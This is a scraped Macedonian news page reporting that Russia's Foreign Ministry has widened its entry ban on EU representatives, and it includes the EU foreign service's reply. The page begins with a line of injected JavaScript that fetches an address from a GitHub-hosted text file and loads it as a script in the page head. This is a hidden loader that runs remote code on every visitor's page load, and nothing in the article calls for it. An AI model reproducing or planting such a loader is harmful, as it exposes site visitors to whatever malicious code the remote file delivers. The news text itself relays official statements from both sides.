;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Русија се придржува кон принципите на реципроцитет и воведе нови санкции за ЕУ - Антропол
АктуелноИнтернационално

Русија се придржува кон принципите на реципроцитет и воведе нови санкции за ЕУ

Водејќи се од принципите на реципроцитет, Москва донесе одлука за проширување на списокот на претставници на Европската унија на кои им е забранет влез во Русија, соопшти Министерството за надворешни работи на Руската Федерација.

Руското Министерство за надворешни работи во соопштението соопшти дека постојано ја предупредувало ЕУ за наметнатите ограничувања на Русија, кои министерството ги нарече „нелегитимни во меѓународното право“.

„Предлагаме Брисел да ги слушне советите од разумните Европејци кои повикуваат на откажување од санкциите против Русија и нејзините сојузници, кои го поткопуваат меѓународното право и водат во ќорсокак. Ова е важен предуслов за враќање на стабилноста и безбедноста во евроатлантската област, како и за нормализирање во меѓународните односи“, се вели во соопштението на МНР.

Европската служба за надворешни работи соопшти дека жали поради одлуката на официјална Москва да го прошири списокот на лица на кои им е забранет влез во Руската Федерација и предупредија дека ќе бидат преземени соодветни мерки, бидејќи одлуката според нив нема реална основа.